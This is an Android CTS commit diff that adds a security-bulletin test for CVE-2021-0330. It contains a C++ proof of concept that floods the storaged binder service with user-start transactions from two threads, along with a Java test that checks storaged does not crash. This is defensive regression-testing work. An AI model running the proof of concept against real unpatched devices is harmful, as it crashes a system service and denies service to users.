diff options
author | TreeHugger Robot <treehugger-gerrit@google.com> | 2021-01-13 05:13:47 +0000 |
---|---|---|
committer | Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com> | 2021-01-13 05:13:47 +0000 |
commit | cf75875aa1e0f92cbedef09ed5408529c569ff49 (patch) | |
tree | bf817b8d407b004d0d07b883b2b4273e7b272fc6 | |
parent | 43aa8508b19ab5e0e97318122487333214a9cdc6 (diff) | |
parent | 969f92c32c1436363a0b22efc9152a9ae3920786 (diff) | |
download | cts-cf75875aa1e0f92cbedef09ed5408529c569ff49.tar.gz |
Merge changes I32758630,Ie8577639,I137dfce1,I2b7cfc76 into qt-dev am: cc01bf5a93 am: b7faba84d6 am: 969f92c32c
Original change: https://googleplex-android-review.googlesource.com/c/platform/cts/+/13325388
MUST ONLY BE SUBMITTED BY AUTOMERGER
Change-Id: I8ab1a90e6bce7f814e5a39080c938b961ca8638f
3 files changed, 138 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp new file mode 100644 index 00000000000..30915d5af09 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp @@ -0,0 +1,28 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0330", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libutils", + "libbinder", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp new file mode 100644 index 00000000000..4d7254f108b --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp @@ -0,0 +1,70 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> +#include <pthread.h> +#include <unistd.h> +#include "../includes/common.h" + +using namespace android; + +static int userId = 0; +constexpr int kMaxThreads = 2; +constexpr int kMaxUsers = 1024 * 1024; +constexpr int kSleepDuration = 5; + + +static void *trigger_onUserStarted(void *p __attribute__((unused))) { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> service = sm->checkService(String16("storaged")); + + if (not service) { + return nullptr; + } + + while (userId < kMaxUsers) { + Parcel data, reply; + data.writeInterfaceToken(service->getInterfaceDescriptor()); + data.writeInt32(++userId); + service->transact(1, data, &reply, 0); + } + + return nullptr; +} + +int main() { + pthread_t threads[kMaxThreads]; + + for (int t = 0; t < kMaxThreads; ++t) { + pthread_create(&threads[t], nullptr, trigger_onUserStarted, nullptr); + } + for (int t = 0; t < kMaxThreads; ++t) { + pthread_join(threads[t], nullptr); + } + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> service = sm->checkService(String16("storaged")); + if (service) { + break; + } + sleep(kSleepDuration); + } + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java new file mode 100644 index 00000000000..3d3f4a8bc15 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.compatibility.common.util.CrashUtils; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0330 extends SecurityTestCase { + + /** + * b/170732441 + * Vulnerability Behaviour: SIGSEGV in storaged + */ + @SecurityTest(minPatchLevel = "2021-02") + @Test + public void testPocCVE_2021_0330() throws Exception { + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0330", getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns("storaged"); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} |